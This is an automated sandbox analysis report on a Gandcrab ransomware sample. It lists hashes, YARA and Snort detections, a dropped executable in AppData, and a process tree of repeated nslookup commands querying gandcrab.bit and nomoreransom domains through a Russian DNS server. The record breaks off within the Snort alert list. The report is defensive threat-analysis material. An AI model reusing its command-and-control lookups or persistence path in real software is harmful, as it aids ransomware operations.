Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gI5xZdIxUs.exe

Overview

General Information

Sample Name:gI5xZdIxUs.exe
Analysis ID:694566
MD5:98a12ec721c098842fbfd7384d5a72ae
SHA1:9dfd7d1746c8ae943f3dced0f85f0e3c6f5084f3
SHA256:f83457d173841c7e944bc60b00c197ca93c864893c71902cf1b1a36decdd30a4
Tags:exe
Infos:

Detection

Gandcrab, ReflectiveLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ReflectiveLoader
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Snort IDS alert for network traffic
Contains functionality to determine the online IP of the system
Found Tor onion address
Uses nslookup.exe to query domains
Machine Learning detection for sample
May check the online IP address of the machine
Performs many domain queries via nslookup
Machine Learning detection for dropped file
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
Drops PE files
Contains functionality to read the PEB
Found evaded block containing many API calls
Contains functionality to enumerate device drivers
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • gI5xZdIxUs.exe (PID: 5280 cmdline: "C:\Users\user\Desktop\gI5xZdIxUs.exe" MD5: 98A12EC721C098842FBFD7384D5A72AE)
    • nslookup.exe (PID: 5960 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4684 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4596 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 6112 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 1916 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5244 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 6028 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5116 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 680 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5124 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4972 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5604 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 736 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4460 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 6052 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5424 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4364 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5188 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 1164 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 1092 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 968 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • isqmkp.exe (PID: 5464 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe" MD5: F4758788F11A0DE8D11EB4B8C515FFBD)
  • isqmkp.exe (PID: 1572 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe" MD5: F4758788F11A0DE8D11EB4B8C515FFBD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
gI5xZdIxUs.exeReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
  • 0xed22:$x1: ReflectiveLoader
gI5xZdIxUs.exeSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
  • 0xe67e:$: DECRYPT.txt
  • 0xe6e4:$: DECRYPT.txt
gI5xZdIxUs.exeJoeSecurity_GandcrabYara detected GandcrabJoe Security
    gI5xZdIxUs.exeJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
      gI5xZdIxUs.exeINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
      • 0xed21:$s1: _ReflectiveLoader@
      • 0xed22:$s2: ReflectiveLoader@
      Click to see the 1 entries

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
      • 0xed22:$x1: ReflectiveLoader
      C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
      • 0xe67e:$: DECRYPT.txt
      • 0xe6e4:$: DECRYPT.txt
      C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeJoeSecurity_GandcrabYara detected GandcrabJoe Security
        C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
          C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0xed21:$s1: _ReflectiveLoader@
          • 0xed22:$s2: ReflectiveLoader@
          Click to see the 1 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000014.00000000.322631215.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
            0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
              0000000E.00000000.307654244.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
                00000001.00000000.272296797.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
                  0000000E.00000000.307645700.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
                    Click to see the 14 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    14.2.isqmkp.exe.f9d0000.0.unpackReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
                    • 0xed22:$x1: ReflectiveLoader
                    14.2.isqmkp.exe.f9d0000.0.unpackSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
                    • 0xe67e:$: DECRYPT.txt
                    • 0xe6e4:$: DECRYPT.txt
                    14.2.isqmkp.exe.f9d0000.0.unpackJoeSecurity_GandcrabYara detected GandcrabJoe Security
                      14.2.isqmkp.exe.f9d0000.0.unpackJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
                        14.2.isqmkp.exe.f9d0000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                        • 0xed21:$s1: _ReflectiveLoader@
                        • 0xed22:$s2: ReflectiveLoader@
                        Click to see the 31 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        Timestamp:192.168.2.38.8.8.860754532829498 08/31/22-23:58:43.044195
                        SID:2829498
                        Source Port:60754
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850789532829498 08/31/22-23:59:48.239260
                        SID:2829498
                        Source Port:50789
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858305532829498 08/31/22-23:59:32.365598
                        SID:2829498
                        Source Port:58305
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865389532829498 08/31/22-23:59:40.892307
                        SID:2829498
                        Source Port:65389
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.849203532026737 08/31/22-23:59:56.322889
                        SID:2026737
                        Source Port:49203
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856952532026737 08/31/22-23:58:46.555077
                        SID:2026737
                        Source Port:56952
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853051532829498 08/31/22-23:59:12.297576
                        SID:2829498
                        Source Port:53051
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853431532829498 08/31/22-23:59:18.287185
                        SID:2829498
                        Source Port:53431
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865022532829498 08/31/22-23:58:54.690068
                        SID:2829498
                        Source Port:65022
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.861420532829498 08/31/22-23:59:01.493233
                        SID:2829498
                        Source Port:61420
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.851994532829498 08/31/22-23:59:24.206869
                        SID:2829498
                        Source Port:51994
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860478532829498 08/31/22-23:59:59.939438
                        SID:2829498
                        Source Port:60478
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865019532829498 08/31/22-23:58:54.630989
                        SID:2829498
                        Source Port:65019
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850230532026737 09/01/22-00:00:07.433896
                        SID:2026737
                        Source Port:50230
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860093532026737 08/31/22-23:59:14.413883
                        SID:2026737
                        Source Port:60093
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858122532026737 08/31/22-23:59:27.247839
                        SID:2026737
                        Source Port:58122
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865515532026737 08/31/22-23:59:20.761806
                        SID:2026737
                        Source Port:65515
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852958532829498 08/31/22-23:58:07.331283
                        SID:2829498
                        Source Port:52958
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.854156532026737 08/31/22-23:59:42.281210
                        SID:2026737
                        Source Port:54156
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865110532829498 08/31/22-23:58:33.358759
                        SID:2829498
                        Source Port:65110
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853430532829498 08/31/22-23:59:18.269254
                        SID:2829498
                        Source Port:53430
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858121532026737 08/31/22-23:59:27.189978
                        SID:2026737
                        Source Port:58121
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865021532829498 08/31/22-23:58:54.669703
                        SID:2829498
                        Source Port:65021
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858306532829498 08/31/22-23:59:32.396919
                        SID:2829498
                        Source Port:58306
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.864126532026737 08/31/22-23:59:50.649034
                        SID:2026737
                        Source Port:64126
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858695532026737 08/31/22-23:58:36.600606
                        SID:2026737
                        Source Port:58695
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.861418532829498 08/31/22-23:59:01.454658
                        SID:2829498
                        Source Port:61418
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865516532026737 08/31/22-23:59:20.780161
                        SID:2026737
                        Source Port:65516
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865111532829498 08/31/22-23:58:33.379307
                        SID:2829498
                        Source Port:65111
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865388532829498 08/31/22-23:59:40.874321
                        SID:2829498
                        Source Port:65388
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858694532026737 08/31/22-23:58:36.580328
                        SID:2026737
                        Source Port:58694
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.854155532026737 08/31/22-23:59:42.262891
                        SID:2026737
                        Source Port:54155
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852957532829498 08/31/22-23:58:07.312591
                        SID:2829498
                        Source Port:52957
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.849204532026737 08/31/22-23:59:56.342973
                        SID:2026737
                        Source Port:49204
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860586532026737 08/31/22-23:58:15.043750
                        SID:2026737
                        Source Port:60586
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850231532026737 09/01/22-00:00:07.455721
                        SID:2026737
                        Source Port:50231
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852959532829498 08/31/22-23:58:07.365561
                        SID:2829498
                        Source Port:52959
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.862054532829498 08/31/22-23:58:21.744663
                        SID:2829498
                        Source Port:62054
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.859641532026737 08/31/22-23:58:24.944174
                        SID:2026737
                        Source Port:59641
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.859638532026737 08/31/22-23:58:24.884406
                        SID:2026737
                        Source Port:59638
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865198532026737 08/31/22-23:59:03.441447
                        SID:2026737
                        Source Port:65198
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865109532829498 08/31/22-23:58:33.338202
                        SID:2829498
                        Source Port:65109
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852457532829498 09/01/22-00:00:11.310934
                        SID:2829498
                        Source Port:52457
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860587532026737 08/31/22-23:58:15.064663
                        SID:2026737
                        Source Port:60587
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853470532026737 08/31/22-23:58:56.772805
                        SID:2026737
                        Source Port:53470
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856620532026737 09/01/22-00:00:02.142088
                        SID:2026737
                        Source Port:56620
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858693532026737 08/31/22-23:58:36.550637
                        SID:2026737
                        Source Port:58693
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858696532026737 08/31/22-23:58:36.619047
                        SID:2026737
                        Source Port:58696
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856954532026737 08/31/22-23:58:46.594398
                        SID:2026737
                        Source Port:56954
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.849205532026737 08/31/22-23:59:56.360951
                        SID:2026737
                        Source Port:49205
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856619532026737 09/01/22-00:00:02.120945
                        SID:2026737
                        Source Port:56619
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.851995532829498 08/31/22-23:59:24.227191
                        SID:2829498
                        Source Port:51995
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.861421532829498 08/31/22-23:59:01.511754
                        SID:2829498
                        Source Port:61421
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852960532829498 08/31/22-23:58:07.384051
                        SID:2829498
                        Source Port:52960
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865390532829498 08/31/22-23:59:40.910653
                        SID:2829498
                        Source Port:65390
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853053532829498 08/31/22-23:59:12.348894
                        SID:2829498
                        Source Port:53053
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.854158532026737 08/31/22-23:59:42.322126
                        SID:2026737
                        Source Port:54158
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860753532829498 08/31/22-23:58:43.024087
                        SID:2829498
                        Source Port:60753
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.857391532829498 09/01/22-00:00:05.158775
                        SID:2829498
                        Source Port:57391
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858303532829498 08/31/22-23:59:32.323930
                        SID:2829498
                        Source Port:58303
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860584532026737 08/31/22-23:58:15.004694
                        SID:2026737
                        Source Port:60584
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858123532026737 08/31/22-23:59:27.268863
                        SID:2026737
                        Source Port:58123
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860091532026737 08/31/22-23:59:14.371988
                        SID:2026737
                        Source Port:60091
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865200532026737 08/31/22-23:59:03.482704
                        SID:2026737
                        Source Port:65200
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853433532829498 08/31/22-23:59:18.325585
                        SID:2829498
                        Source Port:53433
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850787532829498 08/31/22-23:59:48.189200
                        SID:2829498
                        Source Port:50787
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860751532829498 08/31/22-23:58:42.984219
                        SID:2829498
                        Source Port:60751
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850786532829498 08/31/22-23:59:48.168544
                        SID:2829498
                        Source Port:50786
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853468532026737 08/31/22-23:58:56.731128
                        SID:2026737
                        Source Port:53468
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.849206532026737 08/31/22-23:59:56.381031
                        SID:2026737
                        Source Port:49206
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860475532829498 08/31/22-23:59:59.877731
                        SID:2829498
                        Source Port:60475
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.863448532026737 08/31/22-23:59:36.563649
                        SID:2026737
                        Source Port:63448
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.851997532829498 08/31/22-23:59:24.265731
                        SID:2829498
                        Source Port:51997
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856618532026737 09/01/22-00:00:02.100951
                        SID:2026737
                        Source Port:56618
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853471532026737 08/31/22-23:58:56.793274
                        SID:2026737
                        Source Port:53471
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853054532829498 08/31/22-23:59:12.369224
                        SID:2829498
                        Source Port:53054
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852458532829498 09/01/22-00:00:11.330853
                        SID:2829498
                        Source Port:52458
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865513532026737 08/31/22-23:59:20.720500
                        SID:2026737
                        Source Port:65513
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860828532829498 08/31/22-23:59:53.952246
                        SID:2829498
                        Source Port:60828
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.864124532026737 08/31/22-23:59:50.605079
                        SID:2026737
                        Source Port:64124
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.862052532829498 08/31/22-23:58:21.699516
                        SID:2829498
                        Source Port:62052
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.857390532829498 09/01/22-00:00:05.138814
                        SID:2829498
                        Source Port:57390
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850233532026737 09/01/22-00:00:07.502496
                        SID:2026737
                        Source Port:50233
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860090532026737 08/31/22-23:59:14.353291
                        SID:2026737
                        Source Port:60090
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852459532829498 09/01/22-00:00:11.350932
                        SID:2829498
                        Source Port:52459
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860827532829498 08/31/22-23:59:53.930680
                        SID:2829498
                        Source Port:60827
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853469532026737 08/31/22-23:58:56.749513
                        SID:2026737
                        Source Port:53469
